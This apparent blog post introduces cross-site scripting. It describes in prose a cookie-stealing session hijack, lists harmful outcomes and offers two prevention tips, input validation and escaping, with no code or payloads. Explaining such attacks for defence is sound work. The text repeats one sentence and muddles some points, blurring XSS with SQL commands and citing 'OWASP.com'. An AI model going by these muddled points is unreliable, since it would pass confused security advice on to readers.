Cross-site scripting (XSS) is one of the most common application-layer web attacks. XSS targets scripts which are executed on the web browser rather than on the server-side. Cross-site scripting causes applications to execute in the manner desired by the malicious user. A basic example of XSS is when a malicious user injects a script in a legitimate shopping site URL which in turn redirects a user to a fake but identical page. The page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who now hijack the legitimate user's session.
As on-line business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits. Exploited XSS is commonly used to achieve the following malicious results:
Identity theft
Accessing sensitive or restricted information
Gaining free access to otherwise paid for content
Spying on user's web browsing habits
Altering browser functionality
Public defamation of an individual or corporation
Web application defacement
Denial of Service attacks
Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information which allowed them to perform transactions in their name. The major cause of XSS is code validation within the application. A
lot of applications do not validate their input. They don't check to see if the code accepts non-malicious input.
lot of applications do not validate their input. They don't check to see if the code accepts non-malicious input.
Ways to Prevent Cross-Site Scripting Attacks
1. Validate Code: Go through your code and test your code. Ask yourself, “If a person enters “code” in the textbox will the code execute.” The only way to discover this is to try to run “code” within the textbox. The most common code is SQL commands and JavaScript commands.
2. Escaping: Escaping is using special characters as escape characters instead of actual characters such as <,>, &, !, etc.
For more information on Cross-Site Scripting and other web application security check out OWASP.com at
No comments:
Post a Comment